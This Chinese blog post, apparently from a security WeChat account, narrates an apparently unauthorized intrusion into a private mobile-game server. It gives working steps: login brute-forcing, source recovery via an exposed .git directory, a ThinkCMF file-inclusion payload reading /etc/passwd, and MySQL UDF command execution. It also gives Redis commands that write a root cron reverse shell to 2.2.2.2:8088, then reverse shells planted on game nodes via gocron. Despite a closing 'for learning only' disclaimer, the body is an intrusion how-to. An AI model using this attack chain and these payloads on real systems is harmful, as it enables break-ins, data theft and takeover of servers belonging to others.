一次渗透游戏私服的经历

  • A+
所属分类:安全文章
"聚鼎安全"公众号以渗透流程为维度,持续输出知识总结类的文章。
帮助新人和网络安全从业者更好的构建属于自己的知识框架。


碰到了一个加好友推广某手游私服的广告哥,正好周末没事做,于是找他要了app看能不能渗透进去。

一次渗透游戏私服的经历

apk有点大,就不解包反编译了,直接用测试手机挂bp抓包,依旧要了一大堆权限,登陆界面很简陋而且有BUG,比如实名认证的地方可以drop掉,这样无需手机号或者身份证就可以注册账户登录。

游戏呢,是这样的(宣传视频)

一次渗透游戏私服的经历

app用了全流量加密,所有的包都是乱码,就不截图了。

随手在百度site一下,发现个OA

一次渗透游戏私服的经历

没有验证码,且会提示用户名是否正确,看起来是可以爆破的

一次渗透游戏私服的经历

admin的密码直接被爆破出来,不过账户被禁用了

一次渗透游戏私服的经历

那就只能爆破其他用户名,再分别爆破他们的密码。成功登陆

一次渗透游戏私服的经历

不过后台没有任何利用点,没有SQL注入,没有上传点。

结果还是只能扫目录这种粗暴的活儿,扫了没几秒。

一次渗透游戏私服的经历

目录遍历+.git泄露,不过有php的目录无法遍历

一次渗透游戏私服的经历

Githack脱源码

https://github.com/lijiejie/GitHack

一次渗透游戏私服的经历

收获不少,配置文件中有内网redismysql

一次渗透游戏私服的经历

一些隐藏的接口

一次渗透游戏私服的经历

以及最重要的,魔改后的cms版本

一次渗透游戏私服的经历

thinkcmf是有两个比较新的漏洞的

一次渗透游戏私服的经历

先试试第一个,往如下接口上传文件

/index.php?g=Asset&m=Ueditor&a=upload&action=uploadimage

一次渗透游戏私服的经历

一次渗透游戏私服的经历

漏洞似乎修复了,只能上传图片后缀文件

没关系,还有第二个漏洞,文件包含

index.php?a=display&templateFile=/etc/passwd

一次渗透游戏私服的经历

包含index.php会泄露绝对路径

一次渗透游戏私服的经历

第二个漏洞本可以直接getshell的,但我这儿没有成功,配合第一个漏洞也可以getshell

一次渗透游戏私服的经历

很新的版本,提权无望

一次渗透游戏私服的经历

不过还记得配置文件中的redismysql吗?

虽然都是内网中的服务器,不过还是值得一试。

一次渗透游戏私服的经历

mysql居然没有读写保护,那么可以通过udf执行命令

linux64位的udf如下

https://github.com/luoke90hou/files/blob/main/mysqludflinux.txt

select * from func;显示有sys_eval就可以执行命令

一次渗透游戏私服的经历

一次渗透游戏私服的经历

不过mysql服务器不通外网,权限也很低,再试试redis服务器

由于oa服务器上没有redis客户端,所以我用curldict协议来操作局域网redis

一次渗透游戏私服的经历

flushall

config set dir /var/spool/cron/

config set dbfilename root

set 0 "nn*/1 * * * * bash -i>& /dev/tcp/2.2.2.2/8088 0>&1nn"

save

等了一分钟,弹回root权限shell

一次渗透游戏私服的经历

history,发现redis服务器上部署了gocron,这是一个定时任务web项目

一次渗透游戏私服的经历

oa服务器用的一个数据库,不过密码带salt,解不出来,只能新增一个账户登录进去

一次渗透游戏私服的经历

这个系统可以新建crontab,里面刚好有游戏服务器的节点,写入反弹shell的命令,至此渗透完毕。

一次渗透游戏私服的经历


一次渗透游戏私服的经历                                                      


"聚鼎安全"公众号以渗透流程为维度,持续输出知识总结类的文章。
帮助新人和网络安全从业者更好的构建属于自己的知识框架。
关注此公众号,回复"聚鼎安全"关键字领取"惊喜学习礼包"

一次渗透游戏私服的经历

请严格遵守网络安全法相关条例!此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!

本文始发于微信公众号(聚鼎安全):一次渗透游戏私服的经历

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: